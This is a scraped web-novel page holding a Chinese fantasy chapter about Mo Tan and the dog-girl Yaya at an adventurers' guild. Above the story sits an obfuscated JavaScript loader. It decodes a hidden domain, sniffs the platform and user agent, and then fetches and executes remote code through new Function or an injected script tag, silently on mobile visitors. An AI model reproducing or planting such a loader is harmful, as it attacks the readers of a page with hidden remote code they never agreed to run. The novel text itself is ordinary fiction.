98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

第四十五章:冒险者小队(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

不用猜就知道是谁……

“牙牙?”墨檀抬头看着这个猛蹿到自己面前的姑娘,冲她温和地笑了笑:“怎么了?”

他对这个看起来极度单纯可爱的女孩印象还不错,虽然之前给自己稍微添了点儿麻烦,但牙牙明显也不是故意的,毕竟这姑娘怎么看怎么都是一副涉世未深的模样。

女孩将脸颊凑到墨檀肩膀上蹭了蹭,尖尖的兽耳微微背向后面,一双浅绿色的眸子里满是委屈,支支吾吾地嘟囔道:“任务……汪不到……能接的,没汪要……肚子好汪……”

咕噜~

少女的肚子十分适时地叫了一声,似乎是为了帮她翻译一般。

墨檀大概理解了其中百分之七十左右的内容,算是基本明白了大概意思,随后便准备找家店铺给牙牙买点吃的东西,结果一步迈出去后才想起了自己现在这个角色可以说是一穷二白,尽管有几件还不错的低级装备,但论起钱来可是一毛都没有的……

“我正好要去冒险者公会,你也一起好了。”墨檀冲牙牙招了招手:“如果有比较轻松些的任务最好,实在不行我也有办法给你弄点吃的。”

他的办法也挺简单,就是把默这个角色首次登录时得到的那把铁剑找地方卖了,理论上应该多少能换点钱,毕竟之前麦格已经给了他一套新的装备,其中也包含着一把品质优秀的黑钢长剑,所以最开始得到的那把初始武器也就基本没什么用了,卖掉问题也不大。

“汪!”牙牙使劲儿点了点头,紧跟在墨檀身后,毛茸茸的尾巴摇地飞快:“谢谢~”

笑容里的含糖度至少有八个加号之多!

七八分钟后,两人来到了冒险者公会的一层大厅,而就在墨檀正准备挑选任务的时候,那位之前与他有过两面之缘的接待员小姐姐却不知道从什么地方钻了出来,用力拍了下他的肩膀:“喂,你接任务没问题啊,但是不能让这个小姑娘参与进去。”

墨檀微微一楞:“为什么?”

牙牙也用水汪汪的大眼睛看向这位小姐姐,肚子又是‘咕噜’一声。

“为了避免隐患。”对方耸了耸肩,随手不知道从哪儿拿出了一根骨头棒子递给牙牙,抱着胳膊摇头道:“她说不清楚自己当时究竟为什么忽然就发起疯来怒拆房子,我们也没办法确定相同的情况究竟会不会再次发生,所以短时间内她不能接受个人任务。”

墨檀对此表示理解,毕竟他之前也听说了牙牙那番‘壮举’,尽管完全无法想象这个怎么看怎么都人畜无害的犬娘究竟是如何做到的,但分会做出的决定却没什么毛病,而且这对牙牙也是一种保护。

在企图拆某对地精夫妇的家时因为踩到台阶而被炸晕了过去还算好,万一她下次不小心掀了什么隐居高人的摊子可怎么整……

比如在宗教事业中取得了辉煌战果后大隐于市的孙姓尖嘴雷公脸啊~

比如在悬崖底下等了好几百年都没守到自己的真命天子,爬上来改行卖菜的白胡子老大爷啊~

比如身怀外星血脉,因机缘巧合流落至地球时撞到了脑袋,大部分时间都在山里砍柴捕鱼的赛亚人少年啊~

虽然总觉得这些例子好像哪里有点儿不对,但无罪大陆上的确有很多平时不显山不漏水的强者,比起与恶势力或者好势力作斗争,这些人更喜欢平凡安逸的生活……

万一牙牙真的不小心得罪到了几个喜欢低调的剑圣法神之流那乐子就大了。

“要不你在这儿先等着。”墨檀看向牙牙,摊手道:“我找个简单点儿的任务去做一下?”

他倒不是因为牙牙长得漂亮而且还比较呆萌可爱才这么关照她的,其主要原因一方面是因为这个姑娘着实有些可怜,而且好像还有些缺心眼,另外一点则是出于关怀野生小动物以及残(语言功能)障(脑袋有点儿轴)少女的心态,总觉得不好扔着不管……

这无关于对方的种族、性别、外貌、出身等因素,仅取决于墨檀是否觉得自己应该伸出援手,而绝大多数情况下,此时的他都是乐意去帮助每一个深陷窘境之人的,当然前提是对方值得被帮助,而这种人其实并没有我们所想象的那么多,甚至可以说是非常少……

否则的话墨檀在当前人格下也就甭干别的了。

“唔?”正咔嚓咔嚓嚼着嘴里最后一点食物的牙牙一愣,随后抬头看着墨檀反应了一会儿,立刻可怜巴巴地扁了扁嘴,发出了一声呜咽。

这是担心自己被丢掉吗?

墨檀苦笑了一声,自己和这姑娘好像原本就没什么关系啊,这种被当成饲主的既视感是怎么回事……

“这究竟是怎样奇葩的一种返祖现象啊。”接待员小姐姐也有气无力地捂着额头,干笑道:“要是让这丫头的其他同族看到,估计都有可能想打死她以求保住全族的平均智力吧。”

喂,你这话说的有点儿扎心了啊!

墨檀揉了揉牙牙的脑袋,冲小姐姐问道:“那她就这样一直没有办法做任务之类的了吗?”

“那倒也不是。”对方摇头道:“如果以冒险者小队的形式倒是没问题,总之至少得让我们知道有人在看着她,而且还是有那种可以控制住她或者能够实力背锅的,临时小队也可以,只要登记过就行,你的意思是……?”

墨檀点了点头。

“不行。”没想到小姐姐却是伸出食指摇了摇:“冒险者小队都是三到五人的规模,你想帮她也没用,而且这丫头之前的事儿已经传出去了,想找到第二个愿意和她组队的傻……我是说冒险者基本不可能。”

牙牙沮丧地抱着腿蹲下,一对尖耳无精打采地耷拉着:“唔,好多汪,都躲着我汪。”

“所以说,你还是先好好学会说人话,然……”小姐姐说到这里表情忽然一僵,猛地抬头冲墨檀的方向叫道:“你别过来!”

后者顿时一懵,随后便闻到了一股极其不详地焦味从身后传来,他转身一看,顿时腿肚子就是一阵哆嗦。

首当其冲映入眼帘的就是一根不断散发着缕缕黑烟的法杖,讲真,如果这玩意儿的名字叫做【疯狂伊文的拐棍儿】,墨檀绝不会有丝毫惊讶……要是杖头上在安个雷电球或者顽皮弹之类的就贴合其更形象了……

“嗨~年轻人。”自爆拐棍儿……我是说冒烟法杖的主人轻抚着胡子,冲墨檀温和地微笑道:“也许我们此时此刻正有着相同的烦恼,要组队吗?我一等二好几天了。”

看他这模样,想必已经彻底忘记了上次险些把面前这个年轻人给炸死的事儿。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间